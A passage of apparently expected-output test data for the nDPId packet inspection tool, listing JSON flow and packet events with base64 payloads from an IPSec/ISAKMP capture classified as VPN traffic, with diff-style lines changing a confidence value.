5l9EQfvU7Io35Af4zqQ="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":898,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQIF8AAPcRtoFt7bvCwKgCZAH0KQQAPB4RKPIIUorA8+QAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFWSaC4DsICzoX86f4Vpg=="} 01517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763527783,"pkt":"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\/btxDWIa5wgFzCzeQ3x7y72e5UHhqhgvqaYk9jfMQxIVaEW9a\/BsTbbgWHzjuQA+m2wB7LvhFjGB\/zN7IPBMezDEAF2Voyii81jTpzUUJ05HhmyiH0d\/igIqUo6S0VxBu\/wKQAAJJlGk0qPBMMAQyO8c7OtV6h+5wY2ebevcS4SnFRIjN85KQAAHAAAQASbEuzBi4qstlq61cC7lLKgnoRv5wAAABwAAEAFpnJT+g+x5l9EQfvU7Io35Af4zqQ="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMKt9AAD8RIQbAqAJkbe27wjikEZQDOIC8AAAAACjyCFKKwPPkEtTszwKEz4IuICMIAAAAAQAAAywjAAMQd3Fb1jcelHxTVe\/2g8zj76uIg+8eKH8u+8QF+mNPeDJgsw4h2X4zU7etZzV3p7z0YxmJf5uRbi2o6wBWX928PPHxu4H8aPAm4xpIDdoHfgekjdTUgxlE8sqcL9I3c9J9O6LrK0ZkaQC3qjj1M+iyBNV\/\/tKiCzB1FnooNlXDx34GIR3OZsJZO2sSFnKY0ayWw0t6+E4bvW8F4OScDaoq3NOsIN1j42xm64tbn0b8tRzQw3Rxf1j02PuVTkQUYaYXN66Dwr\/olWo4FGPLm3TsZAYhwpbhDyAgddF9qJaJ9yCchNdNF5qUhpSOjYujXNmeg13l13ZprAKS1AF7roe\/W\/TKSlYvsZTqdXNnNirv\/CGa281gDGSwNPqHT4ng1kr9Py+LDxhT1Xt4DB3ZkNCrj9Ar0\/dAuVTg5DdxTeMR6fnGKEShzFOYocqfaSHNbSW81hS3GcGLGENWWJDKQdAVaDmXhW+wUIcccPD8d+gJxpwUns1GebpdvHORZ6U16WRlMFhbJYznKE86SPL478qqc5YEMCqbFMYENZx3aa2g7BY9\/ognKR00zfD\/OOZnmC\/LO1i1Hytf9iNqisx7GlwgAEKNHmcLnmD\/IOuAltGaTroxV2XAlF5QDKx8ZA4ymT6mfhy0E85T4+hw9D6rqU\/Znl0TOiqL9rSFhGp0T4RDBSYkRLmYYFMKk9YEdQsOHhdXqsA203XlTSg2RDhMev\/LxaObttZhGUehoha5Huvu7HxWyDrAWnjIRvSo+n51OHQsCpeyWZ4xoKF9XoJu4QB36L9zgSxGbU5AJfQdOdTfGRC8XxtFVRkGR5QKJXqpwAQThCRy5mlogO6nRUUVL94WSR4qizsYsPrzoHmaNO3KP5++h+YHRjNi5kZipOzu6Al1aY1kEI9Q9T0\/I5fqQgm9I3I6XLLKZ2f1lg8f\/l8TYt0g0pBHSKkDZnOsMMgVwUWaep1BtFEzds85\/gck0joMeSfrr4sz+hNs3GPMVRNI4qIH5v5y0t5Y9PP\/DUBSqwNGKU0aw4aUGztHDzqs"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsIdQAAPcRtHBt7bvCwKgCZBGUOKQA2IOhAAAAACjyCFKKwPPkEtTszwKEz4IuICMgAAAAAQAAAMwkAACwPfbHDUoskxSE5gSUwdfwN6znE\/N7RTjtK44\/DHvn\/\/wwexFQR+bVEpZtp0gTHsHNqUIlLIKHA\/jLWQUdr39M6fjLR9bEnM8bZDOpQoG1FAcUSplJnPky0MftH5FxtXAehv64FgvOmL6ZyUgZev9MgFt3Az+PptEJz6VuLX9fAIliBAE6dzplUiTUzxnJwEflrSTBoQjIhF\/lTF73bdS664b4qJIcOOLwwqHWuQ=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMK0BAAD8RI2XAqAJkbe27wjikEZQAeGpmAAAAACjyCFKKwPPkEtTszwKEz4IuICMIAAAAAgAAAGwwAABQaLfgxnYqNgq2qxmD+Hya19TPQcBLhoYD2BdkF4EMrXTi21s3PaExuSQZpbAyQi70XIBl8RNR\/wXOMFYcsm\/GKhZRmEeJiOHHY9bmSQ=="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":917,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01027{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":917,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":474,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":474,"pkt_l4_len":440,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAHMAv1AAP0RjGfAqAJkbe27wqKSEZQBuF26AAAAAA0wAwLs3PExCE8kgQKA2sMuICMIAAAAAQAAAawjAAGQhVi3P8yzTfHmuI+q40jjfulhmdzYtghBgvrDfHSgYMHGAg2XU9i\/iOgQjyoTY0TYwfvwlijcEIjIzvAbmCqFJUGCB7uzk8JYV1tb1\/YeDhlRfxzft7yHQO3Ef6p28zkuy8rFdFHF7cET9dB0T9UH4lrmMn7TnQw9oUo1fE2lfQyfnpiGB9uSMq+5XNwegEiW7Nw1hb7cs3Be1fS9wwjgXaN2fWfGFNwZF4Bt6ctrjJbmJtMZtXFW9oJ68+mOel2Tq98ZCnnxPX1WsHWoVKSoa0mFFCVz12Zv+T2SRqM1XDU2D\/uzP5EkyXj5wBuUeWYas7JM+IsPF3WZiUzkRkRsF8mzmAEYcS5DjYBLnA1yeNjf2ou1C4A2+9xs8FiE9d5nKnZdo8S\/uRCxBLHweET4Z8rlH5y\/wPttmRjEJXclMVHwSGXStxNWhbQ8yequ3Oj\/iUJV059Ua27OpFQlxw6eychcRPl6ukaA7Loq37Dk+iYqh3xE\/eBHDu5spJ4iZwuTzGEFjIIJjEgu7Fci"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":917,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":917,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsj4QAAPcRRsBt7bvCwKgCZBGUopIA2HVRAAAAAA0wAwLs3PExCE8kgQKA2sMuICMgAAAAAQAAAMwkAACwquU718u5VhZfSwZUPwqxrsfVvbXtg9ycFAzdkanxQ4ZdmhxID0tgHCAM8ZrGCNxZG+FMVTvTdhGn6q1TuemOvZE4\/LhT+0r5el9vMdASwlSSx0gJzmvmxrcB0dt7mxOTFIpkAfSwW5dBG6ONvXmn\/eLVkHomLxSYvgisw8c17eZNpBSLv1WfsJICYvDpJiGKxg9eRd1+NHW\/k+OQLS1krJhN0Ro1DTGeveCqAg=="} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMAv5AAP0RjabAqAJkbe27wqKSEZQAeEmQAAAAAA0wAwLs3PExCE8kgQKA2sMuICMIAAAAAgAAAGwwAABQhVi3P8yzTfHmuI+q40jjfvXXeLkn\/P4\/Guol\/mo4SQDG6v9jAVAtKweO\/8NZOJnwHxQSgEjTe1ProSx0L5Q8GD20Y8a7kPdCB4+4WA=="} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAANMyhBAAD8RgdPAqAJkbe27wzikEZQDOBN4AAAAAIetJ3eFzqOBsYTP+wFs9UMuICMIAAAAAQAAAywjAAMQDxOwAsdF5DcmouqZ3qIIPX2dL17Sxwthytf35vX8VepVzCyasejxBabYcg1eZCOCXo7wibJ+5Ox19FZZ6WA8o\/FtirT1unp5\/KbKnXJj\/jdAwsC5Cmk+0nKvvIVGEa9qjOK1riRUBOLg3AgiPD1b0MEFCXVy4tktzPSYyIT8FCvxETxIN6UD6Cy0KYjRB1oZX0kS66ppXYIIhSpZkY1xn5UMgaZMfKIHRiIv7woIJ2+2jQ73aaZIyotOsyvuBpCcaZZtBWDFsbxm1+cgUkifeDRJjisc\/P6P1jHCx3Z8vmdJyRKNeCtsnStiUyoS1VGy5753yy5XlcqyN1B55mmx4GRa\/HHN4mxvBeQitpdQLQOqc6vSA0zhTHgBD7SqScWn+dc6+bWmJ+j4cfy7mqr12cjpoTIadqdkZ7jJFgUvViPa2cgUSiM3DiCGDwLwi5JltLqmhOCF0oMk1nr3YuvM6ljvscdIRoBP4lidxy72BTx2UZlMkO+gzCPcHOW65ARx8Q3rhw639NUizpwmTbUkhokOYA3JgJkVwbeWLn3lqwv6Ss6NJIdQEqhXHRExkAJxbLRtBylO+3j+muHjVwbAq75LBJzf\/i1UAstHQcg9qDTT\/ZGnKR7Ty8pWWhioaHffJyRRi+h7sK9zbkiOiBD2zt27yYltBBHPMaDytJghkfxYshxtNEjP7DDk9JsIuFz31CRxvyTYCQUiXHMZzbvXZcN82ro0WR0fgq1043ibbzHUg7FzuXDctY\/SwA7NZ6qxwtvg+\/psiPeUB1hzEtF8wdnYUlNalOdh0Yc76GQbrhWCoStkQi0Ydfl4xegAN22+a1lTlBg\/JUSrqLehByai4h1B4NwNJGynTPFzUMsATeVNbTFpe3jxVZt7P0vWrNnV
T5BSaGfJDb7gcqxWmVTROLUQN0E2hcEUz38Y8e\/5eatZL+yHIrAcKK3EtVCpKFtumiow9ZZ6GvGizVBzhM2NnzoVEntamjmvJQIYNFqpe\/oZhY0wNJUxF\/\/qeQzJrYJ1oz4Qh6UIgPZ5y5Hy"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAADsxPAAAPcREVNt7bvDwKgCZBGUOKQA2JZNAAAAAIetJ3eFzqOBsYTP+wFs9UMuICMgAAAAAQAAAMwkAACwMr0OAkWijHaDvVGx2cRd0BpnFxS9yWmk6USjwA1\/uw1HQpBxwIy+M+R8Al6F3b36KkUGMX1VKR6k1QkDbK7wUf6D75B3WW4+ESdgDyReOoS2h1kZn2iRJm0Fo9teEurdyI4sprk4gzmd0gpIbHjeDxKa9imZvZ3qtI3GQJ3qHIAJc5ObsHzpll\/5YtnVtIGJqMEfyVkFO5ycBlEymK2bZ\/IKDHFsKs137Rdruw=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAACMyldAAD8RhEzAqAJkbe27wzikEZQAeNzZAAAAAIetJ3eFzqOBsYTP+wFs9UMuICMIAAAAAgAAAGwwAABQNF9O8PSFPDdTA7ru1rW4e\/OgLqcWU5nzNhiXwaf5BsfwxiuanodxWmR58JZG78eli1reIYIhuG8qOBQ5mrxafVbmCl4feN4SYilPrw=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAFsAvlAAP0RjMvAqAJkbe27wqKSAfQBWN5x2W94XiRTTxcAAAAAAAAAACEgIggAAAAAAAABUCIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAACx++sTkIAWw+R7uHiEwXIocXunucKDvQ5WSJ7oK89SHVsCi3vgdk4CV3hQZ6lLDvwsftNwzYqzFzZyIXPkR15xXGy4j\/8RE04AqF3L6rnl4kSFK8ao0Ashh\/3kXMb9tCb5RitTqZrxo1fBcVb7A7oPwAwOnJNHigc5D1k2OVhjzSkAABgEvd5QXYxmcM3GjeZtcZGvHLA3lSkAABwAAEAEq1KQqOfFPfZ6rmfMr0R1F4jORZkAAAAcAABABfY+rBnlsnnwA5bb6lPTmpcNo5hy"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":947,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":947,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763527783,"pkt":"YDjgxTWgeJS0JASgCABFAABQjVEAAPcRSY9t7bvCwKgCZAH0opIAPIoL2W94XiRTTxcAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFWSdZrX4ccCgpHyIoYQw=="} 
00926{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":402,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":402,"pkt_l4_len":368,"thread_ts_msec":946763527783,"pkt":"eJS0JASgYDjgxTWgCABFAAGEAvpAAP0RjLLAqAJkbe27wqKSAfQBcOGu2W94XiRTTxcAAAAAAAAAACkgIggAAAAAAAABaCEAABgAAEAGAAFWSdZrX4ccCgpHyIoYQyIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAACx++sTkIAWw+R7uHiEwXIocXunucKDvQ5WSJ7oK89SHVsCi3vgdk4CV3hQZ6lLDvwsftNwzYqzFzZyIXPkR15xXGy4j\/8RE04AqF3L6rnl4kSFK8ao0Ashh\/3kXMb9tCb5RitTqZrxo1fBcVb7A7oPwAwOnJNHigc5D1k2OVhjzSkAABgEvd5QXYxmcM3GjeZtcZGvHLA3lSkAABwAAEAEq1KQqOfFPfZ6rmfMr0R1F4jORZkAAAAcAABABfY+rBnlsnnwA5bb6lPTmpcNo5hy"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":946763527783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763527783,"pkt":"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\/+YRhQU1yMpmQB5bWydw9ZfvTkPXAog0gKlZ1KQAAJIVS0Rg+btu6BkuEgsgaurW3aJ4eaYYGQ6VjkOvvz6QMKQAAHAAAQASo5HDOkRKoIfuPc\/+LezYZYFoAhAAAABwAAEAFi9H7SlG8iBMVMxjPqyusPgxIUYI="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 